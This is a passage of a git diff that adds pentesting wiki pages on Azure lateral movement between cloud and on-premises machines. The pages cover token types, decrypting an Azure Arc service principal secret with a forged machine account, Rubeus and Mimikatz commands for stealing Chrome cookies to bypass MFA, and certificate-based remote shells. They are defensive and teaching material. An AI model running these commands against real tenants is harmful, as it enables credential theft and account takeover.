+Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
+
+Commands in Microsoft Graph PowerShell are structured like: `<Action>-Mg<Service> <parameters>`
+
+#### Debug Microsoft Graph PowerShell
+
+Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
+
+```bash
+Get-MgUser -Debug
+```
+
+### ~~**AzureAD Powershell**~~
+
+The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
+
+{% hint style="success" %}
+This is replaced by Microsoft Graph PowerShell
+{% endhint %}
+
+Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
new file mode 100644
index 0000000000..5cb58cb86e
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md
@@ -0,0 +1,91 @@
+# Az - Lateral Movement (Cloud - On-Prem)
+
+## Az - Lateral Movement (Cloud - On-Prem)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### On-Prem machines connected to cloud
+
+There are different ways a machine can be connected to the cloud:
+
+#### Azure AD joined
+
+<figure><img src="../../../.gitbook/assets/image (259).png" alt=""><figcaption></figcaption></figure>
+
+#### Workplace joined
+
+<figure><img src="../../../.gitbook/assets/image (222).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv7UHXsAArdhn?format=jpg&#x26;name=large</a></p></figcaption></figure>
+
+#### Hybrid joined
+
+<figure><img src="../../../.gitbook/assets/image (178).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv77jXkAAC4LK?format=jpg&#x26;name=large</a></p></figcaption></figure>
+
+#### Workplace joined on AADJ or Hybrid
+
+<figure><img src="../../../.gitbook/assets/image (252).png" alt=""><figcaption><p><a href="https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&#x26;name=large">https://pbs.twimg.com/media/EQZv8qBX0AAMWuR?format=jpg&#x26;name=large</a></p></figcaption></figure>
+
+### Tokens and limitations <a href="#tokens-and-limitations" id="tokens-and-limitations"></a>
+
+In Azure AD, there are different types of tokens with specific limitations:
+
+* **Access tokens**: Used to access APIs and resources like the Microsoft Graph. They are tied to a specific client and resource.
+* **Refresh tokens**: Issued to applications to obtain new access tokens. They can only be used by the application they were issued to or a group of applications.
+* **Primary Refresh Tokens (PRT)**: Used for Single Sign-On on Azure AD joined, registered, or hybrid joined devices. They can be used in browser sign-in flows and for signing in to mobile and desktop applications on the device.
+* **Windows Hello for Business keys (WHFB)**: Used for passwordless authentication. It's used to get Primary Refresh Tokens.
+
+The most interesting type of token is the Primary Refresh Token (PRT).
+
+{% content-ref url="az-primary-refresh-token-prt.md" %}
+[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md)
+{% endcontent-ref %}
+
+### Pivoting Techniques
+
+From the **compromised machine to the cloud**:
+
+* [**Pass the Cookie**](az-pass-the-cookie.md): Steal Azure cookies from the browser and use them to login
+* [**Dump processes access tokens**](az-processes-memory-access-token.md): Dump the memory of local processes synchronized with the cloud (like excel, Teams...) and find access tokens in clear text.
+* [**Phishing Primary Refresh Token**](az-phishing-primary-refresh-token-microsoft-entra.md)**:** Phish the PRT to abuse it
+* [**Pass the PRT**](pass-the-prt.md): Steal the device PRT to access Azure impersonating it.
+* [**Pass the Certificate**](az-pass-the-certificate.md)**:** Generate a cert based on the PRT to login from one machine to another
+
+From compromising **AD** to compromising the **Cloud** and from compromising the **Cloud to** compromising **AD**:
+
+* [**Azure AD Connect**](azure-ad-connect-hybrid-identity/)
+* **Another way to pivot from could to On-Prem is** [**abusing Intune**](../az-services/intune.md)
+
+#### [Roadtx](https://github.com/dirkjanm/ROADtools)
+
+This tool allows to perform several actions like register a machine in Azure AD to obtain a PRT, and use PRTs (legit or stolen) to access resources in several different ways. These are not direct attacks, but it facilitates the use of PRTs to access resources in different ways. Find more info in [https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/](https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/)
+
+## References
+
+* [https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
new file mode 100644
index 0000000000..293feeb63a
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
@@ -0,0 +1,97 @@
+# Az - Arc vulnerable GPO Deploy Script
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+### Identifying the Issues
+
+Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
+
+When executed, the DeployGPO.ps1 script performs the following actions:
+
+1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
+2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
+
+When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
+
+An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
+
+```powershell
+# Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
+$DomainComputersSID = "SID=" + $DomainComputersSID
+$DomainControllersSID = "SID=" + $DomainControllersSID
+$descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
+Import-Module $PSScriptRoot\AzureArcDeployment.psm1
+$encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
+```
+
+### Exploit
+
+We have the follow conditions:
+
+1. We have successfully penetrated the internal network.
+2. We have the capability to create or assume control of a computer account within Active Directory.
+3. We have discovered a network share containing the AzureArcDeploy directory.
+
+There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
+
+```powershell
+Import-MKodule powermad
+New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
+```
+
+Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
+
+```powershell
+runas /user:fake01$ /netonly powershell
+```
+
+```powershell
+.\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
+```
+
+By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
+
+```powershell
+Import-Module .\AzureArcDeployment.psm1
+
+$encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedServicePrincipalSecret"
+
+$ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
+$ebs
+```
+
+Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
+
+At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
+
+## References
+
+* [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
new file mode 100644
index 0000000000..0b2239549f
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
@@ -0,0 +1,65 @@
+# Az - Local Cloud Credentials
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Local Token Storage and Security Considerations
+
+### Azure CLI (Command-Line Interface)
+
+Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
+
+1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\<username>\.Azure`.
+2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
+3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
+   * Executed commands with credentials embedded.
+   * URLs accessed using tokens, potentially revealing sensitive information.
+
+### Azure PowerShell
+
+Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
+
+1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\<username>\.Azure`, stores access tokens in plaintext.
+2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
+3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
+
+## Automatic Tools to find them
+
+* [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
+* [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
+
+## Security Recommendations
+
+Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
+
+* Limiting access rights to these files.
+* Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
+* Employing encryption for sensitive files where possible.
+* Educating users about the risks and best practices for handling such sensitive information.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
new file mode 100644
index 0000000000..31e22a7a5d
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
@@ -0,0 +1,67 @@
+# Az - Pass the Certificate
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Pass the Certificate (Azure)
+
+In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
+
+In super simplified terms:
+
+* The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
+* Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
+* Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
+
+In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
+
+* Username
+* Tenant ID
+* PRT
+* Security context
+* Derived Key
+
+It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
+
+{% code overflow="wrap" %}
+```bash
+RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
+```
+{% endcode %}
+
+The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
+
+```bash
+Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
+```
+
+## References
+
+* For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
new file mode 100644
index 0000000000..cdead6bd4b
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
@@ -0,0 +1,59 @@
+# Az - Pass the Cookie
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Why Cookies?
+
+Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
+
+You can see where are **browser cookies located** in:
+
+{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome" %}
+
+## Attack
+
+The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
+
+{% embed url="https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords" %}
+
+With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
+
+```bash
+mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
+```
+
+For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
+
+Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
+
+## References
+
+* [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
new file mode 100644
index 0000000000..301eb11d28
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -0,0 +1,33 @@
+# Az - Phishing Primary Refresh Token (Microsoft Entra)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
new file mode 100644
index 0000000000..1520fc868f
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -0,0 +1,33 @@
+# Az - Primary Refresh Token (PRT)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
